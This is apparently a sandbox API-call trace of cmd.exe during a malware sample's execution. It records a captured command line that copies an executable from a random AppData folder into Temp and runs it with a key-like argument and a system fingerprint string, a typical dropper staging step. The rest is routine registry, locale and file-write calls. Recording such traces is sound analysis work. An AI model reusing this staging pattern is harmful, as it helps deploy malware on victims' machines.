GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.428] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0107.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.429] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.429] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa34 | out: phkResult=0x1afa34*=0x0) returned 0x2 [0107.429] VirtualQuery (in: lpAddress=0x1afa6b, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0107.429] GetConsoleOutputCP () returned 0x1b5 [0107.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.430] SetConsoleCtrlHandler (HandlerRoutine=0x4aa3e72a, Add=1) returned 1 [0107.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.430] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0107.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.430] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0107.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.430] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0107.431] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.431] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0107.431] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.431] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0107.431] GetEnvironmentStringsW () returned 0x1e03b0* [0107.432] FreeEnvironmentStringsW (penv=0x1e03b0) returned 1 [0107.432] GetEnvironmentStringsW () returned 0x1e03b0* [0107.432] FreeEnvironmentStringsW (penv=0x1e03b0) returned 1 [0107.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x60, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegCloseKey (hKey=0x40) returned 0x0 [0107.433] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegCloseKey (hKey=0x40) returned 0x0 [0107.433] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886354 [0107.433] srand (_Seed=0x5b886354) [0107.433] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0107.433] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0107.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.434] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e1b10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0107.434] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0107.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.434] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.435] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0107.435] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0107.435] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0107.435] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0107.435] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0107.435] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0107.435] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0107.435] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0107.435] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0107.435] GetEnvironmentStringsW () returned 0x1e2500* [0107.435] FreeEnvironmentStringsW (penv=0x1e2500) returned 1 [0107.435] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.435] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.435] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0107.435] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0107.436] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0107.436] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0107.436] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0107.436] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0107.436] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0107.436] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0107.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af770 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.436] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af770, lpFilePart=0x1af76c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af76c*="Desktop") returned 0x18 [0107.436] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.436] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x1e0b90 [0107.437] FindClose (in: hFindFile=0x1e0b90 | out: hFindFile=0x1e0b90) returned 1 [0107.437] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x1e0b90 [0107.437] FindClose (in: hFindFile=0x1e0b90 | out: hFindFile=0x1e0b90) returned 1 [0107.437] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x1e0b90 [0107.437] FindClose (in: hFindFile=0x1e0b90 | out: hFindFile=0x1e0b90) returned 1 [0107.437] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.437] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0107.437] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0107.437] GetEnvironmentStringsW () returned 0x1e03b0* [0107.437] FreeEnvironmentStringsW (penv=0x1e03b0) returned 1 [0107.437] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.438] GetConsoleOutputCP () returned 0x1b5 [0107.438] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.438] GetUserDefaultLCID () returned 0x409 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa44950, cchData=8 | out: lpLCData=":") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="1") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa44940, cchData=8 | out: lpLCData="/") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa44d80, cchData=32 | out: lpLCData="Mon") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa44d40, cchData=32 | out: lpLCData="Tue") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa44d00, cchData=32 | out: lpLCData="Wed") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa44cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa44c80, cchData=32 | out: lpLCData="Fri") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa44c40, cchData=32 | out: lpLCData="Sat") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa44c00, cchData=32 | out: lpLCData="Sun") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa44930, cchData=8 | out: lpLCData=".") returned 2 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa44920, cchData=8 | out: lpLCData=",") returned 2 [0107.439] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0107.440] GetConsoleTitleW (in: lpConsoleTitle=0x1d0a28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.503] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0107.503] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0107.503] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0107.504] _wcsicmp (_String1="type", _String2=")") returned 75 [0107.504] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0107.504] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0107.504] _wcsicmp (_String1="IF", _String2="type") returned -11 [0107.504] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0107.504] _wcsicmp (_String1="REM", _String2="type") returned -2 [0107.504] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0107.508] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 68 [0107.508] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 68 [0107.508] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 71 [0107.508] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 71 [0107.508] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 80 [0107.508] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 80 [0107.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.510] GetFileType (hFile=0x7) returned 0x2 [0107.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.510] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af744 | out: lpMode=0x1af744) returned 1 [0107.511] _dup (_FileHandle=1) returned 3 [0107.511] _close (_FileHandle=1) returned 0 [0107.511] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", _String2="con") returned -53 [0107.511] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af714, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0107.512] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0107.512] GetConsoleTitleW (in: lpConsoleTitle=0x1af544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.512] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0107.512] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0107.512] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0107.512] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0107.512] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.513] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1af0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0a8) returned 0x1e2030 [0107.513] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0107.513] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0107.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0107.513] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1adfb4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0107.513] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] GetFileType (hFile=0x54) returned 0x1 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ae00c | out: lpFileSizeHigh=0x1ae00c*=0x0) returned 0x7d600 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.514] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.514] GetFileType (hFile=0x4c) returned 0x1 [0107.514] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.514] GetFileType (hFile=0x4c) returned 0x1 [0107.514] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.514] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.515] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.516] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle 